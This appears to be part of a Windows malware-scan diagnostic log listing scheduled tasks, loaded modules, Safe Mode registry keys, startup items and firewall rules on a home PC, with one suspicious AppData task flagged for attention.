(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)

Task: C:\Windows\Tasks\Adobe Flash Player Updater.job => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d050c18a1d0b1d.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d-Logon.job => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\ISM-UpdateService-4e00205a-2ab1-4423-8f77-cc25b82cde1d.job => C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\Bootstrap.exe
Task: C:\Windows\Tasks\Run_dregol.job => C:\Users\J5DFD~1.POW\AppData\Roaming\RUN_DR~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION

==================== Loaded Modules (Whitelisted) ==============

2012-08-01 08:58 - 2013-11-11 05:02 - 00102176 _____ () C:\Program Files\NVIDIA Corporation\Display\NvSmartMax64.dll
2012-11-03 14:55 - 2012-10-29 08:14 - 01184640 _____ () C:\Program Files\Tablet\Wacom\libxml2.dll
2015-03-17 08:41 - 2015-01-27 05:29 - 08898720 _____ () C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\1033\GrooveIntlResource.dll
2010-07-14 13:11 - 2010-07-14 13:11 - 00031360 _____ () C:\Program Files\ASUS\P4G\DevMng.dll
2012-08-01 09:10 - 2011-03-27 10:23 - 00113840 _____ () C:\Program Files\Asus\Rotation Desktop for G Series\AsusUacSvc.exe
2014-03-22 19:56 - 2014-05-20 09:19 - 00105640 _____ () C:\Program Files\Microsoft Office 15\ClientX64\ApiClient.dll
2013-12-20 17:53 - 2013-12-12 09:56 - 03145536 _____ () C:\Users\J. Powers\AppData\Local\Amazon Cloud Player\Amazon Music Helper.exe
2012-08-01 09:01 - 2012-03-30 02:01 - 00078448 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\QsApoApi64.dll
2012-08-01 09:01 - 2012-03-30 02:01 - 00386160 _____ () C:\Program Files (x86)\VIA\VIAudioi\VDeck\Dts2ApoApi64.dll
2011-05-22 22:04 - 2011-05-22 22:04 - 00084464 _____ () C:\Program Files (x86)\Roxio\CinePlayer\5.0\CPMonitor.exe
2012-08-01 09:01 - 2012-02-21 09:29 - 00128280 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
2011-08-15 17:12 - 2011-08-15 17:12 - 02603520 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\QtCore4.dll
2011-08-15 17:15 - 2011-08-15 17:15 - 00382464 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\QtXml4.dll
2011-08-17 13:41 - 2011-08-17 13:41 - 00400384 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\sqlite3.dll
2011-08-17 13:48 - 2011-08-17 13:48 - 00322048 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\log4cplus.dll
2011-11-25 10:29 - 2011-11-25 10:29 - 00015872 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\featureController.dll
2011-08-15 17:12 - 2011-08-15 17:12 - 01006592 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\QtNetwork4.dll
2011-08-17 13:48 - 2011-08-17 13:48 - 00195584 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\libgsoap.dll
2011-08-15 16:23 - 2011-08-15 16:23 - 00062464 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\zlib1.dll
2011-11-25 10:28 - 2011-11-25 10:28 - 00484352 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\DeviceProfile.dll
2011-11-25 10:42 - 2011-11-25 10:42 - 00499976 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\plugin\PServerPlugin.dll
2011-11-25 10:26 - 2011-11-25 10:26 - 00013824 _____ () C:\Program Files (x86)\Intel\Intel(R) ME FW Recovery Agent\bin\eventsSender.dll
2012-01-12 14:17 - 2012-01-12 14:17 - 00204800 _____ () C:\Program Files (x86)\ASUS\VirtualCamera\virtualCamera.ax
2013-02-11 22:31 - 2013-07-21 18:33 - 01241088 _____ () C:\Program Files (x86)\ManyCam\Bin\opencv_imgproc220.dll
2013-02-11 22:31 - 2013-07-21 18:33 - 02010624 _____ () C:\Program Files (x86)\ManyCam\Bin\opencv_core220.dll
2012-04-29 21:55 - 2012-04-29 21:55 - 08358400 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avcodec-54.dll
2012-04-29 21:55 - 2012-04-29 21:55 - 00151040 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avutil-51.dll
2012-04-29 21:55 - 2012-04-29 21:55 - 01152512 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\avformat-54.dll
2012-04-29 21:55 - 2012-04-29 21:55 - 00333824 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\swscale-2.dll
2012-04-29 21:55 - 2012-04-29 21:55 - 00026112 _____ () C:\Program Files (x86)\SplitMediaLabs\XSplit\swresample-0.dll
2012-01-31 06:25 - 2012-01-31 06:25 - 01163264 _____ () C:\Program Files (x86)\ASUS\Wireless Console 3\acAuth.dll
2012-02-06 16:32 - 2012-02-06 16:32 - 00009216 _____ () C:\Program Files (x86)\ASUS\Splendid\GLCDdll.dll
2010-08-20 06:57 - 2010-08-20 06:57 - 00619816 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMediaLibrary.dll
2010-08-20 06:57 - 2010-08-20 06:57 - 00013096 _____ () C:\Program Files (x86)\CyberLink\Power2Go\CLMLSvcPS.dll
2013-04-14 19:03 - 2013-04-14 19:03 - 00854016 _____ () C:\Windows\assembly\GAC_32\System.Data.SQLite\1.0.61.0__db937bc2d44ff139\System.Data.SQLite.dll
2013-04-14 19:03 - 2013-04-14 19:03 - 00476520 _____ () C:\Windows\assembly\GAC_MSIL\Intuit.Spc.Map.Reporter\5.0.136.0__7ce6deabcb36a8ea\Intuit.Spc.Map.Reporter.dll
2012-08-01 09:00 - 2012-02-21 09:09 - 01198872 _____ () C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\UNS\ACE.dll
2015-07-14 17:19 - 2015-07-14 17:19 - 17448624 _____ () C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_18_0_0_209.dll

==================== Alternate Data Streams (Whitelisted) =========

(If an entry is included in the fixlist, only the ADS will be removed.)

 

[Domo124]

==================== Safe Mode (Whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\McMPFSvc => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MCODS => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mcpltsvc => ""=""
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeaack.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfeavfk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefire => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfefirek.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfehidk.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfemms => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfetdi2k.sys => ""="Driver"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\mfevtp => ""="Service"

==================== EXE Association (Whitelisted) ===============

(If an entry is included in the fixlist, the registry item will be restored to default or removed.)


==================== Internet Explorer trusted/restricted ===============

(If an entry is included in the fixlist, it will be removed from the registry.)


==================== Other Areas ============================

(Currently there is no automatic fix for this section.)

HKU\S-1-5-21-3654736093-338424075-1572945638-1002\Control Panel\Desktop\\Wallpaper -> C:\Users\J. Powers\AppData\Roaming\Mozilla\Firefox\Desktop Background.bmp
DNS Servers: 192.168.1.1

==================== MSCONFIG/TASK MANAGER disabled items ==

(Currently there is no automatic fix for this section.)

MSCONFIG\startupreg: EKStatusMonitor => C:\Program Files (x86)\Kodak\AiO\StatusMonitor\EKStatusMonitor.exe
MSCONFIG\startupreg: ManyCam => "C:\Program Files (x86)\ManyCam\Bin\ManyCam.exe" /silent
MSCONFIG\startupreg: SkyDrive => "C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe" /background
MSCONFIG\startupreg: Steam => "C:\Program Files (x86)\Steam\Steam.exe" -silent

==================== FirewallRules (Whitelisted) ===============

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

FirewallRules: [{90980F70-1BFD-47F5-BA1D-A1D66EF5FCDF}] => (Allow) C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe
FirewallRules: [{C5943DEE-40C5-4BEB-9883-3070E5BA1C63}] => (Allow) LPort=2869
FirewallRules: [{3BEBAB9E-8B7D-43D5-ADC8-FEA64B4F1BCE}] => (Allow) LPort=1900
FirewallRules: [{60A8E612-CCA1-4394-8F9F-56F9916BF15E}] => (Allow) C:\Program Files (x86)\Windows Live\Mesh\MOE.exe
FirewallRules: [{A5FF4CB2-374B-4366-AD4F-F66740C5D92D}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{99E93926-B93C-4F02-8D3F-972EB4DBBEAF}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{033FE77A-C354-456B-9E9B-95CCB9634D09}] => (Allow) C:\Program Files (x86)\Skype\Phone\Skype.exe
FirewallRules: [{A5170979-54B0-4E41-AE8E-6ED8DE7E29A1}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{A9070643-D85D-4F23-BD44-C2C1A46F72D0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1267\Agent.exe
FirewallRules: [{0095A7B7-06C7-4C6A-BA8F-E7B15DFCD764}] => (Allow) C:\Program Files (x86)\StarCraft II\StarCraft II.exe
FirewallRules: [{A7E8BF65-5980-4A99-9C9B-78DAA58884CD}] => (Allow) C:\Program Files (x86)\StarCraft II\StarCraft II.exe
FirewallRules: [{5EAFC6A3-5036-4B09-BCA8-75E6DB8459CB}] => (Allow) C:\Program Files (x86)\StarCraft II\StarCraft II Public Test.exe
FirewallRules: [{DF654D54-4B7D-4460-8794-C873F76709DC}] => (Allow) C:\Program Files (x86)\StarCraft II\StarCraft II Public Test.exe
FirewallRules: [{0B544D72-545D-4D62-A359-FE19CCAC4271}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1363\Agent.exe
FirewallRules: [{91E158FF-BFB6-48DE-8209-53E113744A75}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.1363\Agent.exe
FirewallRules: [{457A2BFB-41C6-4F21-A617-54DA891B275D}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{6399E7A9-4974-4A30-8C4F-5ADC080FFB69}] => (Allow) C:\Program Files\Common Files\McAfee\McSvcHost\McSvHost.exe
FirewallRules: [{8E97813F-216E-43DA-B83F-38C17D6A040A}] => (Allow) LPort=5353
FirewallRules: [{83A36BE7-425D-4778-9E99-ED5142927C50}] => (Allow) LPort=9322
FirewallRules: [{4B16E132-8B00-464A-830B-8B711582453E}] => (Allow) LPort=5353
FirewallRules: [{5DF8F395-2F13-4288-A0E1-36226AC271CE}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdater.exe
FirewallRules: [{741B202D-8D69-41DD-88D4-F13DF65BDA38}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
FirewallRules: [{527271B0-3F9A-466C-A503-76A47CCDB309}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
FirewallRules: [{FFD2C640-B0C0-4F91-8551-6BFCEFCA0911}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
FirewallRules: [{4B924F3C-8946-4644-BB6E-4AF66AAB2656}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
FirewallRules: [{63BE8623-A7AE-4ADB-8044-3090967B1F81}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service\IntuitUpdateService.exe
FirewallRules: [{501C4EB2-2EAF-4257-AF14-65DED6876B7A}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdater.exe
FirewallRules: [{ACA95C0A-59C3-41F8-93A3-6910D7D07E0B}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{AE8B9A5D-C598-43F4-9777-ABFEC535DEB0}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{1B81ADD3-F777-4E1B-AE06-4C89E2692367}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{21DBBEA2-96FA-437F-8A30-020001139FB4}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{0C1C5AEC-5F33-41ED-A341-852BB052A879}] => (Allow) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
FirewallRules: [{E984D471-5035-41A0-B470-45B4B7DFD82C}] => (Allow) C:\Users\J. Powers\AppData\Local\Microsoft\SkyDrive\SkyDrive.exe
FirewallRules: [{9AFA845A-FDB3-459D-8BDC-F46964999A5E}] => (Allow) LPort=9322
FirewallRules: [{C88F8671-F69A-4BC9-BD59-7619F84AB772}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\AiOHomeCenter.exe
FirewallRules: [{E6D9ED11-35B3-4079-B890-5DD7A75AD8AE}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\AiOHomeCenter.exe
FirewallRules: [{0B238C8C-0D42-4118-A40F-879507C70E1D}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\Kodak.Statistics.exe
FirewallRules: [{D8396FF6-BDB6-4933-94D9-85F9EEDAA600}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\Kodak.Statistics.exe
FirewallRules: [{AF79EA57-2406-4483-A1D3-CD25DA4D01DC}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\NetworkPrinterDiscovery.exe
FirewallRules: [{8D01C3CA-6590-421B-B62B-EF41F2BA54F6}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Center\NetworkPrinterDiscovery.exe
FirewallRules: [{B8FF2900-99B2-4439-B59D-C7B8913D7DA7}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Firmware\KodakAiOUpdater.exe
FirewallRules: [{4C40D291-512B-4C18-9C8F-92054EF22403}] => (Allow) C:\Program Files (x86)\Kodak\AiO\Firmware\KodakAiOUpdater.exe
FirewallRules: [{F29EFC21-7C5C-415E-82A7-7D2F30A46C7C}] => (Allow) C:\ProgramData\Kodak\Installer\Setup.exe
FirewallRules: [{EA7C283C-3EBF-4F18-8EBD-AF440C77E971}] => (Allow) C:\ProgramData\Kodak\Installer\Setup.exe
FirewallRules: [{9BC37DF7-E309-426F-AA75-5B93D90F9053}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn (Beta Version)\boot\ffxivboot.exe
FirewallRules: [{9A9A4B39-DBEF-4EAB-B0C4-22D36E5D376B}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn (Beta Version)\boot\ffxivboot.exe
FirewallRules: [{8E487304-6DDE-4EA8-979B-B16FDDC2ECBC}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn (Beta Version)\boot\ffxivlauncher.exe
FirewallRules: [{853D75F9-3A0A-4684-82E1-D82ABF18C52B}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn (Beta Version)\boot\ffxivlauncher.exe
FirewallRules: [{573522B5-5755-4CBE-9774-1A566C8EBC56}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{5CF79FC5-5872-4BB6-A7C9-A3D2479EF5FA}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{1F2F50BD-BCD3-4020-B090-2FF652BCF555}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Audiosurf\engine\QuestViewer.exe
FirewallRules: [{A331CE4A-FF46-4EBC-9DF9-9DE8499DA247}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Audiosurf\engine\QuestViewer.exe
FirewallRules: [{DA30C064-D4DC-4196-AEBB-CA9902DA2F17}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Space Quest Collection\SierraLauncher.exe
FirewallRules: [{666DEAC7-0CF8-4D5D-8F3A-EF0184057A98}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Space Quest Collection\SierraLauncher.exe
FirewallRules: [{C22EE20F-2945-4DC2-9634-68FE135AADC6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Portal\hl2.exe
FirewallRules: [{6ECF9CD6-154D-4E88-A5B7-A1564B183537}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Portal\hl2.exe
FirewallRules: [{6E95B470-9FC5-47C0-9FC0-3C876456410A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{98C7FE60-C27C-498D-B9E8-9900E8BB21F5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Portal 2\portal2.exe
FirewallRules: [{55402BF8-49FC-468D-8B84-1CA3D2892790}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{56C08122-E593-4B27-81A7-6969A0D9AF2B}] => (Allow) C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe
FirewallRules: [{C7C122C4-805B-4D8D-A61C-6FF43B2BFB10}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [{999831D9-7568-4621-905E-243D37DE010A}] => (Allow) C:\Program Files (x86)\EpsonNet\EpsonNet Setup\tool10\ENEasyApp.exe
FirewallRules: [TCP Query User{78942FB4-0703-4C87-A434-8998F1942C60}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [UDP Query User{901C0919-A120-4834-BF37-2C146780D32B}C:\program files (x86)\epson software\event manager\eeventmanager.exe] => (Block) C:\program files (x86)\epson software\event manager\eeventmanager.exe
FirewallRules: [{398B7F50-5963-436E-BA05-204F84F95287}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{8A41C5F6-712E-47CD-BA77-409089802845}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivboot.exe
FirewallRules: [{D4CFFACD-1227-470B-9515-491936F6B636}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{D04F1973-E6C7-4F71-810E-4D40EF838B1A}] => (Allow) C:\Program Files (x86)\SquareEnix\FINAL FANTASY XIV - A Realm Reborn\boot\ffxivlauncher.exe
FirewallRules: [{9379DD5F-7AE4-4966-A11F-42B0FD2EC1BC}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{84F3212B-1066-4565-A493-B7A43E69778E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{64CECB48-EDF2-4E81-923D-B5B2B698E61D}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C645A81D-11FC-450C-B7E0-A538DBD61873}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{C2302A3C-1F2B-4EBF-A962-52406A7A068D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{642EFADE-0C78-46D1-A606-524F93A69EAD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Sid Meier's Civilization V\Launcher.exe
FirewallRules: [{91EE2644-92D3-4B59-B2F6-8A29E938EC26}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{AF817871-C705-4A4A-9459-3BD621A7DC62}] => (Allow) C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe
FirewallRules: [{8609B79D-7B2A-4D18-A1F3-EFDE2B4C642C}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{13438004-8EFA-471E-8CFE-56A8438B859E}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{3296C805-A57C-4F28-B2B8-CB8E4ABFDC7A}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{83A1B00D-EF27-413A-B8D9-C4459BD331E4}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{FEBB3B38-109C-4BA7-BB55-233AC8B1EEF1}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{9E35D38C-0B82-4A9D-A296-24F735BB59C8}] => (Allow) C:\Program Files (x86)\NVIDIA Corporation\NVIDIA Update Core\daemonu.exe
FirewallRules: [{2627EB61-DCD3-4AAD-AE97-841EE24C3274}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{143E6B6A-1B2E-48F4-9205-F36D5DF30433}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe
FirewallRules: [{77ED5BB8-F6C0-4EEF-BD9C-06C697F6936F}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{9C63D244-2060-4666-BDAB-2E5BF2C07D29}] => (Allow) C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamer.exe
FirewallRules: [{6BC35267-8252-4CA4-8C9E-6FF4A1417F4C}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\War Thunder\launcher.exe
FirewallRules: [{7606E5DD-01FE-4AEF-88C2-5DA30C9475E6}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\War Thunder\launcher.exe
FirewallRules: [TCP Query User{D543060F-B044-4BD6-B348-7843C59C7834}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [UDP Query User{1A7D0305-0959-4E17-A9FF-F30B5EEB6B70}C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\war thunder\aces.exe
FirewallRules: [{DD94D82B-7820-4B4C-90AA-38A027CF0CD2}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{1CD40C51-4E48-4D0D-93B4-80869A010AF8}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{AACA3D4C-2F32-4460-9CFC-BDA5E6B78F15}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Primal Carnage Extinction\Binaries\Win64\PrimalCarnageGame.exe
FirewallRules: [{2B1FAF92-F523-41E8-A721-0D9EE032C44D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Primal Carnage Extinction\Binaries\Win64\PrimalCarnageGame.exe
FirewallRules: [{D3AD5DC5-2B20-473B-A077-0DCC2417F401}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{442035F6-E900-4197-8C99-B54F25B0A571}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{6D8D50C8-2677-4F57-8EA9-916419EF3C82}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{C99D1C8D-B3CD-4E2A-A393-DF761B65C722}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Depth\Binaries\Win32\DepthGame.exe
FirewallRules: [{6A90B1DF-C666-48C0-99E9-E6A40CDB40F1}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{067F6036-9A63-4FB1-88DF-E2C2767B6989}] => (Allow) C:\Program Files (x86)\Battle.net\Battle.net.exe
FirewallRules: [{9CADB77C-D6B6-4B14-B598-1AF4B1ED0AAB}] => (Allow) C:\Program Files (x86)\StarCraft II\Versions\Base32283\SC2.exe
FirewallRules: [{7ABE1891-6C9C-4E15-ADD6-C3620414FC19}] => (Allow) C:\Program Files (x86)\StarCraft II\Versions\Base32283\SC2.exe
FirewallRules: [{476703FA-408E-414A-A134-14C1710A6ED0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\MountBlade Warband\mb_warband.exe
FirewallRules: [{B89B029A-D82F-43CE-953F-F59D1337F6E8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\MountBlade Warband\mb_warband.exe
FirewallRules: [{C9646C07-3E75-403F-A3BF-E086A278C7A0}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{D59B3974-A750-4CF8-89C9-A9A0F589E3FA}] => (Allow) C:\Program Files (x86)\Hearthstone\Hearthstone.exe
FirewallRules: [{4730F0F4-2995-4BAC-868E-0C2CF0EE75E1}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Hatoful Boyfriend\hatoful.exe
FirewallRules: [{685315EF-3D4E-4A31-A9B5-51B27C91744E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Hatoful Boyfriend\hatoful.exe
FirewallRules: [{1DD66794-75FA-484B-A10F-29BCD9F3799D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ChaosReborn\ChaosRebornWin64.exe
FirewallRules: [{58D43928-A188-40EE-A062-110DAC55A61F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\ChaosReborn\ChaosRebornWin64.exe
FirewallRules: [{61CD0E57-7C7F-4A13-9F55-2719994FCD04}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{C15956E7-6D77-41E7-8D62-7615150F8FF0}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3634\Agent.exe
FirewallRules: [{2F62EBB5-4845-44A9-8F99-D3DCC7C0B0BF}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\EvolveBeta\Bin64_SteamRetail\StaticLauncher64.exe
FirewallRules: [{E6FF4266-94C2-4A53-B7B5-36364A7BC54B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\EvolveBeta\Bin64_SteamRetail\StaticLauncher64.exe
FirewallRules: [{0C3D59FD-A2CA-496F-B3C7-18C83E6A0651}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{85B7190B-C5D4-4317-ADA6-5FCEC5C43A65}] => (Allow) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
FirewallRules: [{8A3D5210-98C9-42BD-B43D-99D187E40B76}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{DD79DABA-6F0A-4352-8062-5A5E2F506FE1}] => (Allow) C:\Program Files (x86)\Diablo III\Diablo III.exe
FirewallRules: [{5DB49DC9-05ED-4B0D-93E1-3252274D62AA}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
FirewallRules: [{5CF4A43F-D848-439B-BC4F-38BD8FAFB4C9}] => (Allow) C:\ProgramData\Battle.net\Agent\Agent.3688\Agent.exe
